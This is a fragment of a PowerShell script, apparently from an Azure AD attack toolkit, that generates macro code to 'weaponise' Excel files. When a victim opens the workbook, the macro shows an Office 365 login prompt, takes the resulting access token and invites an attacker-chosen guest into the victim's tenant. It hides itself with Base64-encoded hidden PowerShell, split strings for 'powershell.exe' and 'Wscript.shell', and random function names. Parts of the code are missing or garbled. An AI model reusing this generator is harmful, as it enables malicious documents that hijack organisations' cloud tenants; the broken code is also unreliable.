
# This script contains functions for weaponising Office files

# Aug 6th 2020
function Generate-InvitationVBA
    Creates a VBA script block to weaponise Excel files to invite the given guest user to their tenant.

    Creates a VBA script block to weaponise Excel files to invite the given guest user to their tenant.

    The script starts when the Excel workbook is opened:
    * Opens an Office 365 login window to get an access token
    * Using the access token, sends an invitation for the given email address

    Copy the generated script to clipboard and paste to Excel

    New-AADIntInvitationVBA -Email someone@gmail.com | Set-ClipBoard


        # Generate the PowerShell code block

        # First some needed assemblies are imported.
        # Second, a Windows form object is created with a web browser control. The Outlook app id is used.
        # Third, the login window is shown and access token is fetched
        # Finally, the invitation for the given user is sent

Add-Type -AssemblyName System.Windows.Forms;
Add-Type -AssemblyName System.Web;

$l="https://login.microsoftonline.com/common/oauth2/authorize?resource=$r&client_id=$i&response_type=code&haschrome=1&redirect_uri=$u&client-request-id=$((New-Guid).ToString())&prompt=login&scope=openid profile";



$o=irm -Uri "https://login.microsoftonline.com/common/oauth2/token" -ContentType $c -Method POST -Body $b;
$o=irm -Uri "https://graph.microsoft.com/beta/invitations" -Method Post -Body $b -Headers @{"Authorization"="Bearer $($o.access_token)"};

        # Convert the code block to Unicode and decode it with Base64
        # Create the VBA Code

        # Generate a random function name
        $funcName = -join ((97..122) | Get-Random -Count 32 | % {[char]$_})
        $VBA = @"
Private Sub $($Type)_Open()
End Sub

Sub $funcName()`n

        $p = 1

        # Split the Base64 encoded code to shorter chunks
        While(($p*500) -lt $code.Length)
            $codeStr =   $($code.Substring(($p-1)*500,500))
            #$codeStrArr= $codeStr.ToCharArray()
            #$codeStr = -join($codeStrArr)

            $VBA += " i$p = ""$codeStr""`n"
        $VBA += " i$p = ""$($code.Substring(($p-1)*500,$code.Length-($p-1)*500))""`n"
        $VBA += " c1 = Chr(34) & ""pow"" & ""ershel"" & ""l.exe"" & Chr(34)`n"
        $VBA += " c2 = ""-EncodedCommand """

        for($i=1;$i -lt $p+1 ; $i++)
            $VBA += " & i$i"
        $VBA += "`n"

        # Set PowerShell to start as hidden
        $VBA += " c3 = "" -WindowStyle Hidden""`n"

        # Create Wscript.shell object
        $VBA += " Set s2 = CreateObject(""Ws"" & ""cript"" & "".s"" & ""hell"")`n"

        # Invoke the PowerShell minimized
        $VBA += " s2.Run c1 & c2 & c3, 2`n"
        $VBA += "End Sub`n"
        # Return

function Scramble-Text

        foreach($char in $secretArray)
        $num = $num % 256

        $textArray = $Text.ToCharArray()
